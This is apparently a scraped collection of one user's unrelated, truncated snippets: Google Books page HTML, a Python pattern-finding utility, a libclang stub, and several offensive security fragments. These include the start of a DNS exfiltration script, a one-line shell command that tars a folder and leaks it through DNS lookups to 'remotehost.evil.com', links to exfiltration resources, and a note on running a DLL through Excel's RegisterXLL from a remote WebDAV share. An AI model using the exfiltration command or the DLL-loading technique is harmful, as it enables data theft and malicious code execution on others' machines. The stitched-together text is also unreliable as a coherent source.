trolldbois

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><link rel="canonical" href="http://books.google.com/books?id=NyIXAAAAYAAJ"/><title>Excavations at Carnac (Brittany): a ... - Google Books</title><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Timer:a,load:c};try{var g=null;if(window.chrome&&window.chrome.csi)g=Math.floor(window.chrome.csi().pageT);if(g==null)if(window.gtbExternal)g=window.gtbExternal.pageT();if(g==null)if(window.external)g=window.external.pageT;if(g)window.jstiming.pt=g}catch(h){};})();
</script><script>(function() {var preloadImg = document.createElement('img');preloadImg.src = 'http://books.google.com/books?id=NyIXAAAAYAAJ&pg=PA29&img=1&zoom=3&hl=en&q=jaquemet&sig=ACfU3U1Y4HWCC-GoEln9B0N8DaoAvynI5A&w=685';window['_OC_preload_image_url'] = preloadImg.src;})();</script><link rel="stylesheet" href="/books/

trolldbois

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><link rel="canonical" href="http://books.google.com/books?hl=fr&id=J3UoAAAAYAAJ"/><title>Vie de Monseigneur Jaquemet ... - Google Livres</title><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Timer:a,load:c};try{var g=null;if(window.chrome&&window.chrome.csi)g=Math.floor(window.chrome.csi().pageT);if(g==null)if(window.gtbExternal)g=window.gtbExternal.pageT();if(g==null)if(window.external)g=window.external.pageT;if(g)window.jstiming.pt=g}catch(h){};})();
</script><script>(function() {var preloadImg = document.createElement('img');preloadImg.src = 'http://books.google.com/books?id=J3UoAAAAYAAJ&pg=PR18&img=1&zoom=3&hl=fr&q=jaquemet&sig=ACfU3U0v_ANR1DdP2doTJSUPeGto-P3fcA&w=685';window['_OC_preload_image_url'] = preloadImg.src;})();</script><link rel="stylesheet" href="/books/c

trolldbois

>>> a=pattern.findPattern()
found new patterns :
(16, 152, 'z4P4I4u4', 2) P4I4I4u4 (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2}  (z4P4I4u4){2} z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(16, 153, '4P4I4u4z', 2) P4I4I4u4z (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2}  (4P4I4u4z){2} 4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(16, 154, 'P4I4u4z4', 2) P4I4I4u4z4 (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2}  (P4I4u4z4){2

[.. beaucoup de debug ....]

(152, 21, '4u4z4P4I', 19) P4I4I (4u4z4P4I){19} 4u4z4P4I4u4z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336
(152, 22, 'u4z4P4I4', 19) P4I4I4 (u4z4P4I4){19} u4z4P4I4u4z4P4I4u172z4I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12I4T8z4I4z12u4z26336

trolldbois

def findPattern(sequence, elSize=1, minNbGroup=2):
  '''
  returns a regexp grouping repetitive patterns.
  
  @param sequence: a sequence (str/bstr) with rfind() method.
  @param elsize: the size of each element ( 1 to xxx ) in the sequence.
  @param minNbGroup: the minimum number of repetition before trying to group the pattern.

  Examples:
    >>> s = 'aaaaa1111bbbccda2a2a2a2a2b1cb1cb1cb1cabcdabcdabcdabcdpooiiiuuuuyyyyy'

trolldbois

// FIXME:
// JAL: 2013 
// TODO CXString clang_getRecordFieldOffset(CXTranslationUnit TU, CXCursor cursor, int num) {
// TODO CharUnits getAlignment()
int64_t clang_getRecordSize(CXTranslationUnit TU, CXCursor cursor) {
  assert(clang_isDeclaration(cursor.kind) && "isDeclaration == FALSE");

  assert( ((cursor.kind == CXCursor_StructDecl) or 
            (cursor.kind == CXCursor_UnionDecl) or 
            (cursor.kind == CXCursor_ClassDecl)) && "bad declaration kind");

trolldbois

#!/usr/bin/env python
from Crypto.Cipher import AES
import base64
import socket
from Crypto.Hash import MD5
 
DNS_ZONE = “file.hackwhackandsmack.com”
socket.setdefaulttimeout(1)
 
#static password can be taken as an input later

trolldbois

#!/usr/bin/ruby
#
# pass a domain (minus the tld) on cli to exclude from the output
#

require 'socket'


class UDPServer
  def initialize(port)

trolldbois

#from http://scilspace.com/content/data-exfiltration-over-dns
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.evil.com; done)

trolldbois

http://wiki.skullsecurity.org/Dnscat
http://theworldsoldestintern.wordpress.com/2012/11/30/dns-exfiltration-udp-53-indicators-of-exfiltration-udp53ioe/
https://github.com/bigsnarfdude/DFTP
http://blog.commandlinekungfu.com/2012/01/episode-164-exfiltration-nation.html

trolldbois

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc